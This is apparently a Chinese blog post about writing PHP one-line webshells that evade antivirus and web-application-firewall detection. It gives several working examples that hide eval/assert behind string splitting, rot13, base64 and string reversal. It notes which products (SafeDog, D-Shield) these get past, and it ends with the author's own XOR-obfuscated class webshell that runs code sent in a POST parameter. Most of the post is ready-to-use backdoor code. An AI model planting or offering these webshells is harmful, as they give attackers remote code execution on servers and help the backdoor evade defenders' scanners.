Secde0

PHP一句话简单免杀

原型

几种已经开源的免杀思路

  • 拆解合并

    <?php
    $ch = explode(".","hello.ev.world.a.l");
    $c = $ch[1].$ch[3].$ch[4]; //eval
    $c($_POST[\'x\']);
    ?>
    
  • rot13加密

    <?php
    $c=str_rot13(\'n!ff!re!nffreg\');
    $str=explode(\'!\',$c)[3];
    $str($_POST[\'x\']);
    ?>
    
  • rot13+base64

    <?php @eval(str_rot13(base64_decode($_POST[\'ant\'])));?>
    
  • rot13+base64+倒序

    <?php @eval(str_rot13(base64_decode(strrev($_POST[\'ant\']))));?>
    
  • 以及自定义蚁剑编码器

  • 经过测试安全狗应该没有对流量进行检测,对其就行编码加密即可绕过,D盾着不行,如果对敏感函数进行简单的重定义函数名,D盾会爆1可疑文件

自己写的简单webshell

<?php
class Test{
    public $name = \'\';
	public $YH_asset;	#assert	
	
	//assert异或转换
	function __construct(){
		$_gwp="Y"^"\x38";                           
		$_uDO="}"^"\xe";                            
		$_ZnM="&"^"\x55";                           
		$_UaW="w"^"\x12";                           
		$_rUJ="b"^"\x10";                           
		$_nND="S"^"\x27";                           
											
		
		$this->YH_asset=$_gwp.$_uDO.$_ZnM.$_UaW.$_rUJ.$_nND;
	}
	
    function __destruct(){
	$YH_asset = $this->YH_asset;
	//assert(_POST[\'css\']);
              @$YH_asset("$this->name");
    }
}

$test= new Test();
$c = @$_POST[\'css\'];
$test->name = $c;
?>

结语

方法很多,我觉得这个webshell还是太长了,也没有太过细致的研究,之后有时间应该会继续学习下。

分类:

技术点:

相关文章: